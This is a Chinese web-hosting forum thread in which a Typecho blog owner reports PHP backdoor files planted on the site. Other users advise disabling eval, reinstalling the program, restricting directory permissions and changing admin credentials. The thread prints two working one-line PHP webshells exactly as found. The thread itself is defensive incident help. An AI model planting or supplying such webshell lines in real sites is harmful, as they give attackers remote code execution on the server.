全球主机交流论坛

标题: SOS 求助，我的小站难道被针对了？ [打印本页]

作者: 20140727 时间: 2017-10-26 23:15
标题: SOS 求助，我的小站难道被针对了？
昨天发现被挂了代码后，修改了后台管理员密码和后台登陆路径。今晚发现网站的根目录有个helper.class.php的文件，晚上9点半刚生成的。我看饿了下代码是

<?php $_GET[a]($_POST);?>

作者: Gh0st 时间: 2017-10-26 23:18
这个好像是一句话
作者: 20140727 时间: 2017-10-26 23:21

Gh0st 发表于 2017-10-26 23:18
这个好像是一句话

这怎么弄上来的？晕。。。不知道哪里有漏洞。。。还没堵上
作者: 20140727 时间: 2017-10-26 23:40
还有个 Uninstall.php里有
<?php @eval($_POST[finish]);?>

作者: 醉里耍大刀 时间: 2017-10-26 23:48
禁用函数eval
作者: maro666 时间: 2017-10-26 23:49
估计你那源码里一堆洞了
作者: 20140727 时间: 2017-10-26 23:50
刚刚nginx里启用访问日志access.log准备看看有没有什么可以得情况。。。之前都把日志关了。。哎。。
作者: 20140727 时间: 2017-10-26 23:52

maro666 发表于 2017-10-26 23:49
估计你那源码里一堆洞了

什么源码?我插件一个没用，就是博客的外观皮肤用了别人的。
作者: maro666 时间: 2017-10-27 10:01

20140727 发表于 2017-10-26 23:52
什么源码?我插件一个没用，就是博客的外观皮肤用了别人的。

皮肤里面洞才多
作者: 欧阳逍遥 时间: 2017-10-27 10:02
遍地洞啊。建议备份数据库程序重新覆盖一遍吧。

作者: 20140727 时间: 2017-10-27 10:03

maro666 发表于 2017-10-27 10:01
皮肤里面洞才多

刚看到Typecho install.php存在漏洞，目前我已经删除了这个文件。
作者: 20140727 时间: 2017-10-27 10:05
本帖最后由 20140727 于 2017-10-27 10:07 编辑

欧阳逍遥发表于 2017-10-27 10:02
遍地洞啊。建议备份数据库程序重新覆盖一遍吧。

这两个一句话生成了php文件，这个会得到什么？我的根目录都是www-data:www-data权限，幸亏不是root的。一定要程序重新覆盖一遍吗？
作者: 欧阳逍遥 时间: 2017-10-27 10:07

20140727 发表于 2017-10-27 10:05
这两个一句话生成了php文件，这个会得到什么？我的根目录都是www-data:www-data权限，幸亏不是root的。一 ...

一句话就是可以远程执行所有 PHP 代码，PHP 拥有的权限他就可以搞。覆盖程序是防止其他后门，很多变形一句话是没有特征的，有经验的程序员一行一行读才能找到。覆盖是最便捷的方法了。
作者: 20140727 时间: 2017-10-27 10:18

欧阳逍遥发表于 2017-10-27 10:07
一句话就是可以远程执行所有 PHP 代码，PHP 拥有的权限他就可以搞。覆盖程序是防止其他后门，很多变 ...

我都一两个月没备份了。。。怎么办
作者: 欧阳逍遥 时间: 2017-10-27 10:22

20140727 发表于 2017-10-27 10:18
我都一两个月没备份了。。。怎么办

那就修正下权限吧。  我自己的站，因为cms只有 index.php 一个入口，所以子目录我都没给执行。附件目录给读写但是也不给执行，根目录给执行但是不给读写。子目录也做了伪静态处理访问不到。
作者: 20140727 时间: 2017-10-27 11:00

欧阳逍遥发表于 2017-10-27 10:22
那就修正下权限吧。  我自己的站，因为cms只有 index.php 一个入口，所以子目录我都没给执行。附件目录 ...

好的，谢谢
作者: 20140727 时间: 2017-10-27 11:08

欧阳逍遥发表于 2017-10-27 10:22
那就修正下权限吧。  我自己的站，因为cms只有 index.php 一个入口，所以子目录我都没给执行。附件目录 ...

对了，那管理员密码和后台路径是否要修改?？
作者: 欧阳逍遥 时间: 2017-10-27 11:26

20140727 发表于 2017-10-27 11:08
对了，那管理员密码和后台路径是否要修改?？

最好改一下吧，毕竟可以操作你数据。之前帮朋友查过一个 wdcp 的后门，不仅留了很多后门，而且还把登陆的信息写入到一个文件。所以谨慎一点为好。
作者: 20140727 时间: 2017-10-27 11:27

欧阳逍遥发表于 2017-10-27 11:26
最好改一下吧，毕竟可以操作你数据。之前帮朋友查过一个 wdcp 的后门，不仅留了很多后门，而且还把登陆 ...

3Q

欢迎光临全球主机交流论坛 (https://loc.defn.win/) Powered by Discuz! X3.4